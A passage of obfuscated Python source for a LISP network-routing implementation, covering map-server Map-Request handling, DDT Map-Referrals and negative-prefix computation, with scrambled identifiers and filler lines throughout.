O000oOO0Oooo = map_request . signature_eid
if ( o00 == None or O000oOO0Oooo . is_null ( ) ) :
lprint ( "Signature required for site {}" . format ( OOOo0O00OO00O ) )
O0o = False
else :
O000oOO0Oooo = map_request . signature_eid
oO00oO0OOoooO , OO0o0OOO0ooOO00o , O0o = lisp_lookup_public_key ( O000oOO0Oooo )
if ( O0o ) :
O0o = map_request . verify_map_request_sig ( OO0o0OOO0ooOO00o )
else :
lprint ( "Public-key lookup failed for sig-eid {}, hash-eid {}" . format ( O000oOO0Oooo . print_address ( ) , oO00oO0OOoooO . print_address ( ) ) )
if 90 - 90: OoOoOO00
if 21 - 21: i1IIi % oO0o + OOooOOo / I1ii11iIi11i % i1IIi
O0O0OO0O0O = bold ( "passed" , False ) if O0o else bold ( "failed" , False )
lprint ( "Required signature verification {}" . format ( O0O0OO0O0O ) )
if 64 - 64: I1Ii111 - OoOoOO00 * OoooooooOO - I1Ii111
if 43 - 43: I1Ii111 + I11i - Ii1I + I11i - Oo0Ooo
if 63 - 63: IiII % I11i / OoOoOO00 % OOooOOo * iII111i * OoO0O00
if 11 - 11: I1Ii111 * II111iiii
if 3 - 3: Oo0Ooo * OOooOOo
if 13 - 13: I1Ii111 + i11iIiiIii / OOooOOo
if ( O0o and oO00Oooo0o0o0 . registered == False ) :
lprint ( "Site '{}' with EID-prefix {} is not registered for EID {}" . format ( OOOo0O00OO00O , green ( Oo00O0o , False ) , green ( I11i11i1 , False ) ) )
if 98 - 98: I1IiiI * Oo0Ooo
if 9 - 9: O0 / i11iIiiIii . iIii1I11I1II1 . IiII
if 14 - 14: OoOoOO00 . OOooOOo - Oo0Ooo + I1Ii111 % ooOoO0o
if 95 - 95: OoO0O00 * II111iiii + i1IIi
if 22 - 22: Ii1I / ooOoO0o % I11i + OoO0O00 . ooOoO0o
if 61 - 61: O0 - iIii1I11I1II1 * Oo0Ooo . Ii1I + O0
if ( oO00Oooo0o0o0 . accept_more_specifics == False ) :
OOo0O0O0o0 = oO00Oooo0o0o0 . eid
O0o00oOOOO00 = oO00Oooo0o0o0 . group
if 20 - 20: ooOoO0o / ooOoO0o - Ii1I - ooOoO0o
if 93 - 93: O0 * OoOoOO00 * iIii1I11I1II1
if 3 - 3: I1ii11iIi11i - O0
if 46 - 46: iII111i
if 99 - 99: oO0o
oo0o = 1
if ( oO00Oooo0o0o0 . force_ttl != None ) :
oo0o = oO00Oooo0o0o0 . force_ttl | 0x80000000
if 85 - 85: I1Ii111 * iIii1I11I1II1 . OoOoOO00
if 20 - 20: I11i * O0 - OoooooooOO * OOooOOo % oO0o * iII111i
if 70 - 70: I11i + O0 . i11iIiiIii . OOooOOo
if 48 - 48: iIii1I11I1II1 * Ii1I - OoooooooOO / oO0o - OoO0O00 / i11iIiiIii
if 24 - 24: I1IiiI
lisp_send_negative_map_reply ( lisp_sockets , OOo0O0O0o0 , O0o00oOOOO00 , oOO000 , oO00o0o0O ,
mr_sport , oo0o , oooOOOO0oOo , o0oo0O )
if 63 - 63: I11i - iIii1I11I1II1 * Ii1I + OoooooooOO . i11iIiiIii
return ( [ OOo0O0O0o0 , O0o00oOOOO00 , LISP_DDT_ACTION_MS_NOT_REG ] )
if 94 - 94: OoO0O00 . oO0o . OoOoOO00 * i11iIiiIii
if 96 - 96: i1IIi . OoO0O00 . OoO0O00 - o0oOOo0O0Ooo - Ii1I
if 33 - 33: ooOoO0o + I1ii11iIi11i - I1IiiI . iII111i / OoO0O00
if 91 - 91: OOooOOo - OoooooooOO . OoO0O00
if 34 - 34: Ii1I . I1IiiI . i1IIi * I1ii11iIi11i
o0i1i = False
i11i1111I1I1 = ""
OO0000O = False
if ( oO00Oooo0o0o0 . force_nat_proxy_reply ) :
i11i1111I1I1 = ", nat-forced"
o0i1i = True
OO0000O = True
elif ( oO00Oooo0o0o0 . force_proxy_reply ) :
i11i1111I1I1 = ", forced"
OO0000O = True
elif ( oO00Oooo0o0o0 . proxy_reply_requested ) :
i11i1111I1I1 = ", requested"
OO0000O = True
elif ( map_request . pitr_bit and oO00Oooo0o0o0 . pitr_proxy_reply_drop ) :
i11i1111I1I1 = ", drop-to-pitr"
OOo000 = LISP_DROP_ACTION
elif ( oO00Oooo0o0o0 . proxy_reply_action != "" ) :
OOo000 = oO00Oooo0o0o0 . proxy_reply_action
i11i1111I1I1 = ", forced, action {}" . format ( OOo000 )
OOo000 = LISP_DROP_ACTION if ( OOo000 == "drop" ) else LISP_NATIVE_FORWARD_ACTION
if 45 - 45: O0 * iII111i + oO0o + ooOoO0o
if 29 - 29: OoO0O00
if 24 - 24: IiII - OoOoOO00 / OoooooooOO . I1ii11iIi11i
if 88 - 88: I11i
if 36 - 36: iIii1I11I1II1 - ooOoO0o * OoO0O00 * OoO0O00 . II111iiii
if 49 - 49: O0 + OoO0O00 - I1ii11iIi11i + ooOoO0o
if 90 - 90: O0 . Ii1I * OOooOOo * OoooooooOO * ooOoO0o * Ii1I
i11iii1III1i = False
I1Ii = None
if ( OO0000O and lisp_policies . has_key ( oO00Oooo0o0o0 . policy ) ) :
III1I1Iii1 = lisp_policies [ oO00Oooo0o0o0 . policy ]
if ( III1I1Iii1 . match_policy_map_request ( map_request , mr_source ) ) : I1Ii = III1I1Iii1
if 54 - 54: IiII . iII111i * OOooOOo / ooOoO0o . i11iIiiIii
if ( I1Ii ) :
o0 = bold ( "matched" , False )
lprint ( "Map-Request {} policy '{}', set-action '{}'" . format ( o0 ,
III1I1Iii1 . policy_name , III1I1Iii1 . set_action ) )
else :
o0 = bold ( "no match" , False )
lprint ( "Map-Request {} for policy '{}', implied drop" . format ( o0 ,
III1I1Iii1 . policy_name ) )
i11iii1III1i = True
if 91 - 91: ooOoO0o % iII111i
if 41 - 41: o0oOOo0O0Ooo . I1Ii111 + IiII / oO0o
if 86 - 86: iII111i % OoOoOO00 . i11iIiiIii . I1Ii111 + II111iiii . i1IIi
if ( i11i1111I1I1 != "" ) :
lprint ( "Proxy-replying for EID {}, found site '{}' EID-prefix {}{}" . format ( green ( I11i11i1 , False ) , OOOo0O00OO00O , green ( Oo00O0o , False ) ,
# O0 . I1ii11iIi11i / OOooOOo % IiII * Oo0Ooo / OoO0O00
i11i1111I1I1 ) )
if 67 - 67: Oo0Ooo * I11i - IiII + I1Ii111
ooo0oo = oO00Oooo0o0o0 . registered_rlocs
oo0o = 1440
if ( o0i1i ) :
if ( oO00Oooo0o0o0 . site_id != 0 ) :
O00oOOOOoOO = map_request . source_eid
ooo0oo = lisp_get_private_rloc_set ( oO00Oooo0o0o0 , O00oOOOOoOO , O0o00oOOOO00 )
if 7 - 7: IiII - oO0o
if ( ooo0oo == oO00Oooo0o0o0 . registered_rlocs ) :
IIiiiIiii = ( oO00Oooo0o0o0 . group . is_null ( ) == False )
I1III = lisp_get_partial_rloc_set ( ooo0oo , I11oo , IIiiiIiii )
if ( I1III != ooo0oo ) :
oo0o = 15
ooo0oo = I1III
if 22 - 22: o0oOOo0O0Ooo * I1Ii111 * I1ii11iIi11i . OoOoOO00 . i1IIi % ooOoO0o
if 67 - 67: I11i
if 95 - 95: OoO0O00 % I1Ii111
if 49 - 49: II111iiii % OoOoOO00 % OOooOOo
if 40 - 40: I1ii11iIi11i + i1IIi
if 9 - 9: OOooOOo
if 74 - 74: OoOoOO00 - OOooOOo % OoOoOO00
if 82 - 82: I11i % IiII + Oo0Ooo + iIii1I11I1II1 - I11i - I1IiiI
if ( oO00Oooo0o0o0 . force_ttl != None ) :
oo0o = oO00Oooo0o0o0 . force_ttl | 0x80000000
if 65 - 65: IiII / O0 * II111iiii + oO0o
if 52 - 52: o0oOOo0O0Ooo - OoOoOO00 * II111iiii / OoooooooOO
if 44 - 44: OOooOOo - oO0o + o0oOOo0O0Ooo - i1IIi % o0oOOo0O0Ooo
if 79 - 79: iII111i . iIii1I11I1II1
if 42 - 42: i11iIiiIii / IiII . O0 / OOooOOo . iII111i * i1IIi
if 83 - 83: iIii1I11I1II1 . II111iiii * Oo0Ooo . I1IiiI - I1IiiI - iIii1I11I1II1
if ( I1Ii ) :
if ( I1Ii . set_record_ttl ) :
oo0o = I1Ii . set_record_ttl
lprint ( "Policy set-record-ttl to {}" . format ( oo0o ) )
if 29 - 29: Oo0Ooo
if ( I1Ii . set_action == "drop" ) :
lprint ( "Policy set-action drop, send negative Map-Reply" )
OOo000 = LISP_POLICY_DENIED_ACTION
ooo0oo = [ ]
else :
oOo00O = I1Ii . set_policy_map_reply ( )
if ( oOo00O ) : ooo0oo = [ oOo00O ]
if 35 - 35: OoOoOO00 + II111iiii
if 46 - 46: O0 / I1ii11iIi11i + OOooOOo - I1Ii111 + I1IiiI - ooOoO0o
if 96 - 96: IiII + i1IIi - I11i * I11i - OoO0O00 % II111iiii
if ( i11iii1III1i ) :
lprint ( "Implied drop action, send negative Map-Reply" )
OOo000 = LISP_POLICY_DENIED_ACTION
ooo0oo = [ ]
if 47 - 47: I1Ii111 . i11iIiiIii + oO0o . I1ii11iIi11i
if 12 - 12: iIii1I11I1II1 % I1Ii111 * OoOoOO00 / OoooooooOO % OoooooooOO
oO0O0o00oOo = oO00Oooo0o0o0 . echo_nonce_capable
if 81 - 81: iIii1I11I1II1 - Oo0Ooo - ooOoO0o . OoO0O00 + I1ii11iIi11i
if 84 - 84: iII111i . OOooOOo . iII111i * oO0o % Ii1I . oO0o
if 86 - 86: iII111i * ooOoO0o / iIii1I11I1II1 + Ii1I . iII111i
if 64 - 64: IiII - Oo0Ooo % iII111i % I11i
if ( O0o ) :
iIiI1IIi1Ii1i = oO00Oooo0o0o0 . eid
ii1IIi11i = oO00Oooo0o0o0 . group
else :
iIiI1IIi1Ii1i = OOo0O0O0o0
ii1IIi11i = O0o00oOOOO00
OOo000 = LISP_AUTH_FAILURE_ACTION
ooo0oo = [ ]
if 89 - 89: I1Ii111 / II111iiii . ooOoO0o . oO0o
if 74 - 74: O0 / I1ii11iIi11i
if 95 - 95: i11iIiiIii % i11iIiiIii / i1IIi * i11iIiiIii
if 62 - 62: I1ii11iIi11i . I1IiiI / OOooOOo
if 94 - 94: IiII
if 48 - 48: Oo0Ooo + Oo0Ooo / OoO0O00 + OoOoOO00
packet = lisp_build_map_reply ( iIiI1IIi1Ii1i , ii1IIi11i , ooo0oo ,
oOO000 , OOo000 , oo0o , False , None , oO0O0o00oOo , False )
if 23 - 23: iIii1I11I1II1 - OoOoOO00
if ( o0oo0O ) :
lisp_process_pubsub ( lisp_sockets , packet , iIiI1IIi1Ii1i , oO00o0o0O ,
mr_sport , oOO000 , oo0o , oooOOOO0oOo )
else :
lisp_send_map_reply ( lisp_sockets , packet , oO00o0o0O , mr_sport )
if 10 - 10: iIii1I11I1II1 + i1IIi * Ii1I / iIii1I11I1II1 % OoOoOO00 / O0
if 14 - 14: O0
return ( [ oO00Oooo0o0o0 . eid , oO00Oooo0o0o0 . group , LISP_DDT_ACTION_MS_ACK ] )
if 65 - 65: IiII / oO0o
if 57 - 57: IiII + oO0o - IiII
if 51 - 51: OoOoOO00 % IiII / iII111i - oO0o - OoO0O00 . iIii1I11I1II1
if 61 - 61: OoO0O00
if 60 - 60: I1IiiI % O0 % OoooooooOO / Ii1I
OOO0Oo0o = len ( oO00Oooo0o0o0 . registered_rlocs )
if ( OOO0Oo0o == 0 ) :
lprint ( "Requested EID {} found site '{}' with EID-prefix {} with " + "no registered RLOCs" . format ( green ( I11i11i1 , False ) , OOOo0O00OO00O ,
# I1Ii111
green ( Oo00O0o , False ) ) )
return ( [ oO00Oooo0o0o0 . eid , oO00Oooo0o0o0 . group , LISP_DDT_ACTION_MS_ACK ] )
if 19 - 19: I11i % IiII
if 73 - 73: i11iIiiIii . II111iiii
if 26 - 26: Oo0Ooo * i1IIi / OoooooooOO
if 78 - 78: O0 + OOooOOo . I11i * OoOoOO00 - OoooooooOO
if 92 - 92: o0oOOo0O0Ooo + OoOoOO00 / oO0o . I1Ii111 * I1IiiI * OoOoOO00
I1iiOo0O0O000 = map_request . target_eid if map_request . source_eid . is_null ( ) else map_request . source_eid
if 29 - 29: OoOoOO00 + I1IiiI - OoOoOO00
I1I = map_request . target_eid . hash_address ( I1iiOo0O0O000 )
I1I %= OOO0Oo0o
iIi11I11I1i = oO00Oooo0o0o0 . registered_rlocs [ I1I ]
if 83 - 83: II111iiii
if ( iIi11I11I1i . rloc . is_null ( ) ) :
lprint ( ( "Suppress forwarding Map-Request for EID {} at site '{}' " + "EID-prefix {}, no RLOC address" ) . format ( green ( I11i11i1 , False ) ,
# iIii1I11I1II1 / i1IIi / ooOoO0o
OOOo0O00OO00O , green ( Oo00O0o , False ) ) )
else :
lprint ( ( "Forwarding Map-Request for EID {} to ETR {} at site '{}' " + "EID-prefix {}" ) . format ( green ( I11i11i1 , False ) ,
# o0oOOo0O0Ooo % I11i . Oo0Ooo * Oo0Ooo % iII111i
red ( iIi11I11I1i . rloc . print_address ( ) , False ) , OOOo0O00OO00O ,
green ( Oo00O0o , False ) ) )
if 37 - 37: OoO0O00 / I1Ii111 . I1Ii111 * i1IIi
if 22 - 22: I1ii11iIi11i . II111iiii + iIii1I11I1II1 / OoooooooOO . ooOoO0o
if 13 - 13: II111iiii
if 36 - 36: iII111i - oO0o / Oo0Ooo / O0 . OoO0O00 . i1IIi
lisp_send_ecm ( lisp_sockets , packet , map_request . source_eid , mr_sport ,
map_request . target_eid , iIi11I11I1i . rloc , to_etr = True )
if 19 - 19: O0 . OoooooooOO % iIii1I11I1II1 - Ii1I . Ii1I + I1IiiI
return ( [ oO00Oooo0o0o0 . eid , oO00Oooo0o0o0 . group , LISP_DDT_ACTION_MS_ACK ] )
if 98 - 98: oO0o . Oo0Ooo
if 9 - 9: I1Ii111 % IiII - i11iIiiIii - OOooOOo % iII111i % OoooooooOO
if 6 - 6: i1IIi - II111iiii * OoOoOO00 + oO0o
if 6 - 6: I1IiiI - ooOoO0o + I1IiiI + OoO0O00 - i11iIiiIii % ooOoO0o
if 64 - 64: OoooooooOO + OOooOOo
if 36 - 36: I1IiiI - Ii1I / I1ii11iIi11i + Oo0Ooo % I1ii11iIi11i
if 86 - 86: iIii1I11I1II1 * OoO0O00
def lisp_ddt_process_map_request ( lisp_sockets , map_request , ecm_source , port ) :
if 82 - 82: I1IiiI - OoO0O00 % o0oOOo0O0Ooo
if 72 - 72: O0 + OoOoOO00 % OOooOOo / oO0o / IiII
if 98 - 98: Oo0Ooo . II111iiii * I11i
if 39 - 39: IiII * o0oOOo0O0Ooo + Ii1I - I11i
OOo0O0O0o0 = map_request . target_eid
O0o00oOOOO00 = map_request . target_group
I11i11i1 = lisp_print_eid_tuple ( OOo0O0O0o0 , O0o00oOOOO00 )
oOO000 = map_request . nonce
OOo000 = LISP_DDT_ACTION_NULL
if 70 - 70: oO0o * ooOoO0o / ooOoO0o - Ii1I * Ii1I % OOooOOo
if 91 - 91: OoO0O00 - OoO0O00 % O0
if 67 - 67: ooOoO0o * i1IIi
if 66 - 66: o0oOOo0O0Ooo - I1ii11iIi11i . OoOoOO00 / iII111i - Ii1I - i1IIi
if 97 - 97: oO0o % iII111i - OOooOOo . OoooooooOO
oo0ooo = None
if ( lisp_i_am_ms ) :
oO00Oooo0o0o0 = lisp_site_eid_lookup ( OOo0O0O0o0 , O0o00oOOOO00 , False )
if ( oO00Oooo0o0o0 == None ) : return
if 58 - 58: I1Ii111 / iII111i / oO0o
if ( oO00Oooo0o0o0 . registered ) :
OOo000 = LISP_DDT_ACTION_MS_ACK
oo0o = 1440
else :
OOo0O0O0o0 , O0o00oOOOO00 , OOo000 = lisp_ms_compute_neg_prefix ( OOo0O0O0o0 , O0o00oOOOO00 )
OOo000 = LISP_DDT_ACTION_MS_NOT_REG
oo0o = 1
if 69 - 69: i11iIiiIii / O0 - OoooooooOO + I1ii11iIi11i . OoO0O00
else :
oo0ooo = lisp_ddt_cache_lookup ( OOo0O0O0o0 , O0o00oOOOO00 , False )
if ( oo0ooo == None ) :
OOo000 = LISP_DDT_ACTION_NOT_AUTH
oo0o = 0
lprint ( "DDT delegation entry not found for EID {}" . format ( green ( I11i11i1 , False ) ) )
if 19 - 19: I1IiiI / iII111i . OOooOOo / oO0o + I1ii11iIi11i + OOooOOo
elif ( oo0ooo . is_auth_prefix ( ) ) :
if 1 - 1: iIii1I11I1II1
if 59 - 59: ooOoO0o % I1IiiI + i1IIi * I1Ii111 % o0oOOo0O0Ooo * II111iiii
if 22 - 22: OoOoOO00 * O0 + OoOoOO00 / iIii1I11I1II1 + oO0o + IiII
if 69 - 69: iIii1I11I1II1 . I1Ii111 * iII111i
OOo000 = LISP_DDT_ACTION_DELEGATION_HOLE
oo0o = 15
I1I1I1i1I = oo0ooo . print_eid_tuple ( )
lprint ( ( "DDT delegation entry not found but auth-prefix {} " + "found for EID {}" ) . format ( I1I1I1i1I ,
# iIii1I11I1II1 / OOooOOo
green ( I11i11i1 , False ) ) )
if 2 - 2: I11i - OOooOOo / o0oOOo0O0Ooo
if ( O0o00oOOOO00 . is_null ( ) ) :
OOo0O0O0o0 = lisp_ddt_compute_neg_prefix ( OOo0O0O0o0 , oo0ooo ,
lisp_ddt_cache )
else :
O0o00oOOOO00 = lisp_ddt_compute_neg_prefix ( O0o00oOOOO00 , oo0ooo ,
lisp_ddt_cache )
OOo0O0O0o0 = lisp_ddt_compute_neg_prefix ( OOo0O0O0o0 , oo0ooo ,
oo0ooo . source_cache )
if 14 - 14: I11i + Oo0Ooo + i11iIiiIii - i1IIi . O0
oo0ooo = None
else :
I1I1I1i1I = oo0ooo . print_eid_tuple ( )
lprint ( "DDT delegation entry {} found for EID {}" . format ( I1I1I1i1I , green ( I11i11i1 , False ) ) )
if 47 - 47: o0oOOo0O0Ooo / i1IIi * IiII
oo0o = 1440
if 50 - 50: I11i
if 9 - 9: iII111i . OoOoOO00 * iII111i
if 54 - 54: i11iIiiIii * I1IiiI / IiII - OoO0O00 % i1IIi
if 2 - 2: II111iiii - OoOoOO00
if 81 - 81: IiII / OOooOOo / OoooooooOO + II111iiii - OOooOOo . i11iIiiIii
if 33 - 33: o0oOOo0O0Ooo - OoooooooOO
IIii1i = lisp_build_map_referral ( OOo0O0O0o0 , O0o00oOOOO00 , oo0ooo , OOo000 , oo0o , oOO000 )
oOO000 = map_request . nonce >> 32
if ( map_request . nonce != 0 and oOO000 != 0xdfdf0e1d ) : port = LISP_CTRL_PORT
lisp_send_map_referral ( lisp_sockets , IIii1i , ecm_source , port )
return
if 30 - 30: i1IIi + II111iiii + OoOoOO00 + I1ii11iIi11i % ooOoO0o % OOooOOo
if 40 - 40: I1IiiI % I1IiiI - i11iIiiIii % OoOoOO00
if 17 - 17: ooOoO0o - i1IIi
if 73 - 73: iIii1I11I1II1 - I1Ii111 % Oo0Ooo . O0
if 16 - 16: OoO0O00 / Oo0Ooo / IiII . Oo0Ooo - OoooooooOO
if 5 - 5: OoOoOO00 . I11i
if 28 - 28: I11i % OOooOOo + Oo0Ooo / OoO0O00 % o0oOOo0O0Ooo + OoO0O00
if 20 - 20: ooOoO0o . iII111i % OOooOOo + i11iIiiIii
if 64 - 64: i1IIi . o0oOOo0O0Ooo * I1Ii111 - O0
if 76 - 76: I1IiiI % Ii1I + OoO0O00 + I1ii11iIi11i * II111iiii + Oo0Ooo
if 3 - 3: Ii1I - I1IiiI + O0
if 90 - 90: Ii1I + OoooooooOO . i11iIiiIii / Oo0Ooo % OoOoOO00 / IiII
if 45 - 45: OoooooooOO / oO0o . I1ii11iIi11i + OOooOOo
def lisp_find_negative_mask_len ( eid , entry_prefix , neg_prefix ) :
O0OOoOoO = eid . hash_address ( entry_prefix )
o00Oo0o0oO = eid . addr_length ( ) * 8
iIi1iii1 = 0
if 67 - 67: o0oOOo0O0Ooo - Ii1I
if 29 - 29: OoOoOO00 . I1ii11iIi11i
if 24 - 24: OOooOOo + i1IIi . I11i . OoOoOO00 + OoooooooOO
if 98 - 98: ooOoO0o + i1IIi / I1IiiI
for iIi1iii1 in range ( o00Oo0o0oO ) :
i1I = 1 << ( o00Oo0o0oO - iIi1iii1 - 1 )
if ( O0OOoOoO & i1I ) : break
if 20 - 20: II111iiii . IiII
if 10 - 10: IiII / OoooooooOO * IiII
if ( iIi1iii1 > neg_prefix . mask_len ) : neg_prefix . mask_len = iIi1iii1
return
if 22 - 22: I1ii11iIi11i * OoooooooOO
if 22 - 22: II111iiii . Ii1I + iIii1I11I1II1
if 91 - 91: II111iiii / iIii1I11I1II1 / OoOoOO00 . II111iiii
if 58 - 58: OoOoOO00 - II111iiii
if 77 - 77: I1ii11iIi11i
if 72 - 72: I1IiiI - i1IIi
if 11 - 11: iIii1I11I1II1 . OoO0O00 * Ii1I
if 65 - 65: Oo0Ooo / OoooooooOO
if 60 - 60: II111iiii + I1IiiI % oO0o - o0oOOo0O0Ooo
if 50 - 50: iIii1I11I1II1 - i11iIiiIii / iII111i + ooOoO0o / OOooOOo
def lisp_neg_prefix_walk ( entry , parms ) :
OOo0O0O0o0 , o0o0o , iiiii1ii11iI = parms
if 64 - 64: OoooooooOO + i11iIiiIii / O0 % OoO0O00 / OoO0O00
if ( o0o0o == None ) :
if ( entry . eid . instance_id != OOo0O0O0o0 . instance_id ) :
return ( [ True , parms ] )
if 74 - 74: i11iIiiIii . I1ii11iIi11i % I11i + I1Ii111
if ( entry . eid . afi != OOo0O0O0o0 . afi ) : return ( [ True , parms ] )
else :
if ( entry . eid . is_more_specific ( o0o0o ) == False ) :
return ( [ True , parms ] )
if 61 - 61: IiII . I1Ii111 . I11i - I1IiiI . iII111i + II111iiii
if 9 - 9: I1Ii111 . iIii1I11I1II1 / O0 * i11iIiiIii
if 91 - 91: ooOoO0o / I1Ii111 . OoO0O00 - IiII * ooOoO0o
if 64 - 64: OoooooooOO
if 56 - 56: I11i / iIii1I11I1II1 - OoOoOO00 . Oo0Ooo + oO0o - ooOoO0o
if 51 - 51: O0 . O0
lisp_find_negative_mask_len ( OOo0O0O0o0 , entry . eid , iiiii1ii11iI )
return ( [ True , parms ] )
if 9 - 9: Oo0Ooo . i1IIi - i1IIi + I1Ii111 * ooOoO0o . I1ii11iIi11i
if 17 - 17: I11i * I1ii11iIi11i % I1IiiI + OoO0O00 + IiII
if 90 - 90: OoooooooOO - I1IiiI / I1ii11iIi11i + oO0o - o0oOOo0O0Ooo
if 84 - 84: OoOoOO00 + O0 % Oo0Ooo
if 22 - 22: iIii1I11I1II1 % i11iIiiIii
if 29 - 29: ooOoO0o - iII111i + IiII % Ii1I - oO0o - ooOoO0o
if 43 - 43: oO0o
if 22 - 22: I1Ii111 + i11iIiiIii
def lisp_ddt_compute_neg_prefix ( eid , ddt_entry , cache ) :
if 49 - 49: O0 % II111iiii . OOooOOo + iII111i + iIii1I11I1II1 / i11iIiiIii
if 79 - 79: II111iiii + ooOoO0o - i1IIi - i1IIi + II111iiii . i1IIi
if 78 - 78: I1IiiI * I11i % OOooOOo + Ii1I + OoOoOO00
if 23 - 23: iII111i / Oo0Ooo % OoooooooOO * OoooooooOO . iII111i / I1ii11iIi11i
if ( eid . is_binary ( ) == False ) : return ( eid )
if 30 - 30: oO0o - OoOoOO00 . I1IiiI
iiiii1ii11iI = lisp_address ( eid . afi , "" , 0 , 0 )
iiiii1ii11iI . copy_address ( eid )
iiiii1ii11iI . mask_len = 0
if 17 - 17: OoOoOO00
OO00oo0Oo = ddt_entry . print_eid_tuple ( )
o0o0o = ddt_entry . eid
if 88 - 88: O0 - i1IIi . II111iiii - O0 + O0 / I1ii11iIi11i
if 9 - 9: iIii1I11I1II1
if 57 - 57: i1IIi * OOooOOo
if 35 - 35: I1Ii111 / Oo0Ooo * OoooooooOO / O0 / iIii1I11I1II1
if 44 - 44: o0oOOo0O0Ooo / iIii1I11I1II1
eid , o0o0o , iiiii1ii11iI = cache . walk_cache ( lisp_neg_prefix_walk ,
( eid , o0o0o , iiiii1ii11iI ) )
if 40 - 40: OoO0O00 / O0
if 60 - 60: iIii1I11I1II1 / Oo0Ooo / oO0o + iII111i
if 66 - 66: iIii1I11I1II1 . O0 * IiII . ooOoO0o + i1IIi
if 83 - 83: o0oOOo0O0Ooo / II111iiii + I1IiiI - iII111i + OoO0O00
iiiii1ii11iI . mask_address ( iiiii1ii11iI . mask_len )
if 67 - 67: I1Ii111 - OoOoOO00 . i11iIiiIii - I1Ii111 . i11iIiiIii
lprint ( ( "Least specific prefix computed from ddt-cache for EID {} " + "using auth-prefix {} is {}" ) . format ( green ( eid . print_address ( ) , False ) ,
# I11i + I11i
OO00oo0Oo , iiiii1ii11iI . print_prefix ( ) ) )
return ( iiiii1ii11iI )
if 42 - 42: OoOoOO00 % I1IiiI * Oo0Ooo * II111iiii + O0 - II111iiii
if 97 - 97: I1IiiI
if 87 - 87: I11i + iIii1I11I1II1
if 91 - 91: oO0o
if 58 - 58: i11iIiiIii / Ii1I - OoooooooOO
if 25 - 25: i1IIi * ooOoO0o % OOooOOo / I1IiiI
if 75 - 75: i11iIiiIii
if 38 - 38: iIii1I11I1II1
def lisp_ms_compute_neg_prefix ( eid , group ) :
iiiii1ii11iI = lisp_address ( eid . afi , "" , 0 , 0 )
iiiii1ii11iI . copy_address ( eid )
iiiii1ii11iI . mask_len = 0
o0o00o0 = lisp_address ( group . afi , "" , 0 , 0 )
o0o00o0 . copy_address ( group )
o0o00o0 . mask_len = 0
o0o0o = None
if 48 - 48: I1Ii111
if 91 - 91: ooOoO0o / II111iiii % iIii1I11I1II1
if 70 - 70: i1IIi - II111iiii / I1IiiI + OoooooooOO + i11iIiiIii / i1IIi
if 80 - 80: i1IIi - iIii1I11I1II1 + OoooooooOO + ooOoO0o / IiII - I1ii11iIi11i
if 90 - 90: I1IiiI * ooOoO0o - I11i + O0 - I11i
if ( group . is_null ( ) ) :
oo0ooo = lisp_ddt_cache . lookup_cache ( eid , False )
if ( oo0ooo == None ) :
iiiii1ii11iI . mask_len = iiiii1ii11iI . host_mask_len ( )
o0o00o0 . mask_len = o0o00o0 . host_mask_len ( )
return ( [ iiiii1ii11iI , o0o00o0 , LISP_DDT_ACTION_NOT_AUTH ] )
if 59 - 59: OOooOOo % II111iiii
iiIii = lisp_sites_by_eid
if ( oo0ooo . is_auth_prefix ( ) ) : o0o0o = oo0ooo . eid
else :
oo0ooo = lisp_ddt_cache . lookup_cache ( group , False )
if ( oo0ooo == None ) :
iiiii1ii11iI . mask_len = iiiii1ii11iI . host_mask_len ( )
o0o00o0 . mask_len = o0o00o0 . host_mask_len ( )
return ( [ iiiii1ii11iI , o0o00o0 , LISP_DDT_ACTION_NOT_AUTH ] )
if 38 - 38: IiII . IiII
if ( oo0ooo . is_auth_prefix ( ) ) : o0o0o = oo0ooo . group
if 53 - 53: II111iiii + Ii1I * o0oOOo0O0Ooo
group , o0o0o , o0o00o0 = lisp_sites_by_eid . walk_cache ( lisp_neg_prefix_walk , ( group , o0o0o , o0o00o0 ) )
if 47 - 47: Ii1I % OOooOOo . Oo0Ooo
if 94 - 94: Ii1I - iIii1I11I1II1 + I1IiiI - iIii1I11I1II1 . o0oOOo0O0Ooo
o0o00o0 . mask_address ( o0o00o0 . mask_len )
if 3 - 3: O0 / I11i + OoOoOO00 % IiII / i11iIiiIii
lprint ( ( "Least specific prefix computed from site-cache for " + "group EID {} using auth-prefix {} is {}" ) . format ( group . print_address ( ) , o0o0o . print_prefix ( ) if ( o0o0o != None ) else "'not found'" ,
# i1IIi + II111iiii
# iIii1I11I1II1 - O0 % Oo0Ooo * OoooooooOO / I1IiiI
# I11i % i1IIi - I1ii11iIi11i . Oo0Ooo
o0o00o0 . print_prefix ( ) ) )
if 69 - 69: ooOoO0o * OoO0O00 % o0oOOo0O0Ooo * o0oOOo0O0Ooo
iiIii = oo0ooo . source_cache
if 35 - 35: I1IiiI . OOooOOo * OoO0O00 . I1ii11iIi11i - I1IiiI
if 5 - 5: i1IIi * II111iiii
if 64 - 64: I1IiiI * iIii1I11I1II1 % I1Ii111
if 22 - 22: OoooooooOO + I1Ii111 . o0oOOo0O0Ooo * Oo0Ooo
if 61 - 61: iIii1I11I1II1
OOo000 = LISP_DDT_ACTION_DELEGATION_HOLE if ( o0o0o != None ) else LISP_DDT_ACTION_NOT_AUTH
if 95 - 95: I1ii11iIi11i + IiII * Ii1I - IiII
if 58 - 58: I1ii11iIi11i - oO0o % I11i * O0
if 43 - 43: OoOoOO00 + O0
if 71 - 71: ooOoO0o * I1IiiI / I1ii11iIi11i
if 8 - 8: I1Ii111 / iIii1I11I1II1
if 29 - 29: i11iIiiIii % i1IIi + oO0o . I1ii11iIi11i
eid , o0o0o , iiiii1ii11iI = iiIii . walk_cache ( lisp_neg_prefix_walk ,
( eid , o0o0o , iiiii1ii11iI ) )
if 51 - 51: OOooOOo + o0oOOo0O0Ooo . OOooOOo
if 23 - 23: iIii1I11I1II1 + OoO0O00 / I1IiiI
if 48 - 48: OoOoOO00 + I11i + oO0o . I1IiiI
if 7 - 7: iII111i * i1IIi % OoOoOO00 % Ii1I . I1IiiI
iiiii1ii11iI . mask_address ( iiiii1ii11iI . mask_len )
if 53 - 53: OOooOOo / I11i + OOooOOo / I1IiiI / OoO0O00
lprint ( ( "Least specific prefix computed from site-cache for EID {} " + "using auth-prefix {} is {}" ) . format ( green ( eid . print_address ( ) , False ) ,
# o0oOOo0O0Ooo
# i1IIi . i11iIiiIii * IiII * I11i % I1IiiI
o0o0o . print_prefix ( ) if ( o0o0o != None ) else "'not found'" , iiiii1ii11iI . print_prefix ( ) ) )
if 67 - 67: O0 . I1Ii111 + ooOoO0o
if 88 - 88: I1Ii111 . O0 - oO0o + i1IIi % Oo0Ooo
return ( [ iiiii1ii11iI , o0o00o0 , OOo000 ] )
if 39 - 39: I1Ii111 - I1IiiI
